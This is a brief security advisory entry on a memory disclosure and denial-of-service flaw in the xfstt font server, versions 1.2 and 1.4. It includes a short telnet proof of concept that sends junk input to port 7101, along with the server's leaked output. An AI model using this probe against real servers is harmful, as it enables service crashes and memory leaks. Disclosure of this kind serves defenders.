xfstt 1.2/1.4 Unspecified Memory Disclosure Vulnerability



source: http://www.securityfocus.com/bid/8255/info


xfstt is reported to be prone to an unspecified memory disclosure vulnerability. This issue can be triggered by remote attackers to cause a denial of service. The server may also return details about the memory layout of the underlying system when this issue is triggered.

# telnet localhost 7101
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
xxxxxxx
HDxxxxxxx

þ@Connection closed by foreign host.